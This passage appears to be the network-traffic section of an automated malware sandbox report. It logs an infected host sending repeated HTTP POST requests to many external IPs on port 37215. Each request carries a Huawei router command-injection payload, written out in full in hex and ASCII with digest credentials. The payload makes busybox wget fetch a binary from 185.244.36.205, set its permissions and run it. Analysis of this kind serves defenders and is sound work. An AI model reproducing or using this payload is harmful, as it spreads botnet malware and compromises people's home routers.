                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1815192.168.2.153982437.147.174.4437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:21.947277069 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1816192.168.2.1540104138.54.67.13137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:21.947304964 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1817192.168.2.154746241.96.5.20637215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:21.947339058 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1818192.168.2.1537566121.125.91.20437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:21.947354078 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1819192.168.2.1553708197.72.34.9037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:21.947357893 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1820192.168.2.155024231.235.115.16437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:21.947357893 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1821192.168.2.1556308181.23.24.4037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:21.947375059 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1822192.168.2.1560296218.2.254.10137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:21.947392941 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1823192.168.2.1557884148.81.114.7037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:21.947416067 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1824192.168.2.153776837.247.148.4637215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:21.947439909 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
